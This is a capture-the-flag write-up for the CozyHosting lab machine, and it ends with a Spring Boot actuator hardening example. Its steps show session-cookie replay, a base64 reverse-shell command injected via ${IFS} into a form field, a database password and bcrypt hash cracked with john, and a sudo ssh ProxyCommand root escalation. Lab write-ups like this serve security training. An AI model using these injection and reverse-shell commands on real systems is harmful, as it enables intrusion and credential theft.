# CozyHosting

## 1. nmap scan

```
sudo vim /etc/hosts
10.10.11.230 cozyhosting.htb
```

## 2. Directory enumeration (dirb, dirsearch, ...)

```
sudo apt-get install dirsearch
```

http://cozyhosting.htb/actuator/sessions

## 3. Intercept the login sessions with Burp

After modifying the cookie, login succeeds and an SSH login verification feature is found.

Intercepting it reveals error=/bin/bash: -c

## 4. Reverse shell

[kali] nc -nvlp 9001

```
echo "bash -i >& /dev/tcp/10.10.14.47/9001 0>&1" | base64 -w 0
```

```
;echo${IFS%??}"YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC40Ny85MDAxIDA+JjEK"${IFS%??}|${IFS%??}base64${IFS%??}-d${IFS%??}|${IFS%??}bash;
```

URL-encode the key characters.

The reverse connection succeeds.

Stabilize the shell:

```
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
ctrl + z
stty raw -echo; fg
```

ls

A jar file is found:

```
sudo wget http://10.10.11.230:4444/cloudhosting-0.0.1.jar
jd-gui [filename]
```

## 5. Password cracking

```
psql -h 127.0.0.1 -U postgres
```

password: Vg&nvzAQ7XxR

```
\c cozyhosting
select * from users
```

admin $2a$10$SpKYdHLB0FOaT7n3x72wtuS0yR8uqqbNNpIPjUb2MZib3H9kVO8dm (q to quit)

```
john cozy.txt --wordlist=/usr/share/wordlists/rockyou.txt
```
(gzip -d rockyou.txt.gz)

manchesterunited

cat /etc/passwd: the username josh is found.

## 6. Privilege escalation

```
ssh josh@10.10.11.230
ls
cat user.txt
```
(flag1)

```
sudo -l
sudo ssh -o ProxyCommand=';sh 0<&2 1>&2' x
```
(GTFOBins) https://gtfobins.github.io/gtfobins/ssh/#sudo

cat root.txt (flag2)
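The exposed /actuator/sessions endpoint found in steps 2 and 3 is a Spring Boot management configuration issue. The following application.properties fragment is an added example, not code from this write-up or from the target application, showing the exposing setting next to a restricted one that keeps session data off the web.

```properties
# Weak (before): every actuator endpoint, including /actuator/sessions,
# is served over HTTP. The sessions endpoint lists live session IDs,
# which is exactly what the cookie replay in step 3 relied on.
#management.endpoints.web.exposure.include=*

# Restricted (after): only the health endpoint is reachable over HTTP,
# and it reports no component details. Every other endpoint, sessions
# included, stays unexposed unless it is added here deliberately.
management.endpoints.web.exposure.include=health
management.endpoint.health.show-details=never
```

With the restricted settings a request to /actuator/sessions returns 404 instead of a session list, so directory enumeration no longer yields anything reusable.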